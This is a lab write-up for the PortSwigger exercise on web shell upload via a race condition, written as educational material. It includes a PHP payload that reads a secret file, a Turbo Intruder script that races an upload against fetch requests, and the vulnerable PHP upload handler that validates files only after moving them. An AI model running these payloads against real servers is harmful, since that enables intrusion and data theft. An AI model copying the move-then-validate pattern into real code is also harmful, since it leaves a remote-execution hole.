# Web shell upload via race condition

## Description

[This lab](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition) contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them. 

## Reproduction and proof of concept

1. Log in and upload an image as your avatar, then go back to your account page.
2. In Burp, go to **Proxy -> HTTP history** and notice that your image was fetched using a `GET` request to `/files/avatars/<YOUR-IMAGE>`.
3. On your system, create a file called `exploit.php` containing a script for fetching the contents of Carlos's secret. For example:

```text
<?php echo file_get_contents('/home/carlos/secret'); ?>
```
    
4. Log in and attempt to upload the script as your avatar. Observe that the server appears to successfully prevent you from uploading files that aren't images, even if you try using some of the techniques you've learned in previous labs.
5. If you haven't already, add the [Turbo Intruder extension](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988) to Burp from the BApp store.
6. Right-click on the `POST /my-account/avatar` request that was used to submit the file upload and select **Extensions -> Turbo Intruder -> Send to turbo intruder**. The Turbo Intruder window opens.
7. Copy and paste the following script template into Turbo Intruder's Python editor:

```text
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
```

8. In the script, replace `<YOUR-POST-REQUEST>` with the entire `POST /my-account/avatar` request containing the `exploit.php` file. You can copy and paste this from the top of the Turbo Intruder window.
9. Replace `<YOUR-GET-REQUEST>` with a `GET` request for fetching your uploaded PHP file. The simplest way to do this is to copy the `GET /files/avatars/<YOUR-IMAGE>` request from your proxy history, then change the filename in the path to `exploit.php`.
10. At the bottom of the Turbo Intruder window, click **Attack**. This script will submit a single `POST` request to upload your `exploit.php` file, instantly followed by 5 `GET` requests to `/files/avatars/exploit.php`.
11. In the results list, notice that some `GET` requests received a 200 response containing Carlos's secret. These requests hit the server after the PHP file was uploaded, but before it failed validation and was deleted.
12. Submit the secret to solve the lab.

## Exploitability

An attacker will need to log in to `wiener:peter`; upload a basic PHP web shell, then use it to exfiltrate the contents of the file `/home/carlos/secret`; and then enter this secret using the button provided in the lab banner.  

The vulnerable code that introduces this race condition:

```text
<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
    if($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?> 
```

The uploaded file is moved to an accessible folder, where it is checked for viruses. Malicious files are only removed once the virus check is complete. This means it is possible to execute the file in the small time-window before it is removed.

Due to the generous time window for this race condition, it is possible to solve this lab by manually sending two requests in quick succession using Burp Repeater. The solution described here teaches you a practical approach for exploiting similar vulnerabilities in the wild, where the window may only be a few milliseconds. 
